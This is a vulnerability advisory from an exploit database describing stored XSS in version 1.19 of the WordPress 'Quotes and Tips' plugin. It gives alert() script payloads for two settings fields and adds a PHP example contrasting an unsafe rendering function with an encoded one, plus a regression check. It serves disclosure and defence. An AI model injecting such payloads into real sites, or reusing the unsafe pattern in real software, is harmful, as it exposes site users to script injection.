0day Today Exploits Market and 0day Exploits Database

WordPress Quotes And Tips 1.19 Cross Site Scripting Vulnerability

Author : Madhu Akula
Risk : Security Risk Low
0day-ID : 0day-ID-24749
Category : web applications
Date added : 18-12-2015
Platform : php
Plugin Name : Quotes and Tips
 
Affected Version : 1.19 (and most probably lower versions, if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula

 
Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
Enter the payloads below into the following fields on the plugin settings page:
 
http://localhost/wp-admin/admin.php?page=quotes-and-tips.php
 
qtsndtps_tip_label = "><script>alert(1)</script>
qtsndtps_quote_label = "><script>alert(2)</script>

Vulnerable Parameter : qtsndtps_tip_label, qtsndtps_quote_label
 
Type of XSS : Stored
 
Fixed in : 1.20
 
http://wordpress.org/plugins/quotes-and-tips/changelog/
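
The stored-XSS pattern described above, next to its output-encoded form, as an added example; it is not the plugin's source code and not the 1.20 fix. It assumes the saved label is echoed into an HTML attribute value (which the "> prefix of the PoC suggests); the function names and the sample data are hypothetical.

```php
<?php
// Added illustration, not the plugin's code. Option names are from the
// advisory; the rendering functions below are hypothetical.

// Constructed sample: values saved through the settings form.
$saved = [
    'qtsndtps_tip_label'   => '"><script>alert(1)</script>',
    'qtsndtps_quote_label' => 'Quote of the day',
];

// Unsafe pattern: the stored value is concatenated into an attribute as-is,
// so a leading "> closes the attribute and the tag, and markup after it is live.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// In WordPress the equivalent output call is esc_attr(); sanitize_text_field()
// applied on save additionally strips tags before the value is stored.
function render_field_safe(string $name, string $value): string
{
    $n = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $v = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $n . '" value="' . $v . '" />';
}

// Regression check: parse the rendered markup and report whether the stored
// value produced a real <script> element in the DOM.
function contains_live_script(string $html): bool
{
    $prev = libxml_use_internal_errors(true);
    $doc  = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    return $doc->getElementsByTagName('script')->length > 0;
}

foreach ($saved as $name => $value) {
    printf(
        "%s: unsafe render has script=%s, safe render has script=%s\n",
        $name,
        var_export(contains_live_script(render_field_unsafe($name, $value)), true),
        var_export(contains_live_script(render_field_safe($name, $value)), true)
    );
}
```

The same check can be kept as a regression test for any settings field whose stored value is printed back into the admin page.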


